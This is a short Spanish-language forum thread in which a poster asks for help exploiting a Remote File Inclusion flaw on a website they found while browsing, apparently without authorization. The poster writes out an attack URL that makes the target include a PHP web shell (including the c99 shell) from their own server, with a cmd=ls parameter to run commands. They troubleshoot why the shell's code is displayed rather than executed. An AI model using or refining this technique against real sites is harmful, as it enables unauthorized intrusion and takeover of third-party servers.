Hola

Veran, navegando por inet, me tope con una pagina vulnerable a RFI, puedo redireccionarla a google, a mi server o a casa de mi abuela. El caso esque tengo 2 shells programadas con codigo php, una con extension .txt y la otra con .gif, pero al hacer:

www.webvulnerable.php?url=http://miwebserver.com/shell.txt&cmd=ls

Me aparece el codigod e mi shell por pantalla, tambien lo he probado con las tipicas c99.txt y tampoco, la subo al server, redirecciono la web vulnerable a mi servidor web donde esta alojada la shell y nada, me muestra todo el codigo por pantalla.

¿Alguna sugerencia?

Gracias y saludos

Fue un deliz poner el "&", de todos modos, ya lo probe con "?" y tampoco. lo unico que hace es mostrar mi propio codigo por pantalla.

Gracias de todos modos

Duda aclarada entonces.

Gracias por tu tiempo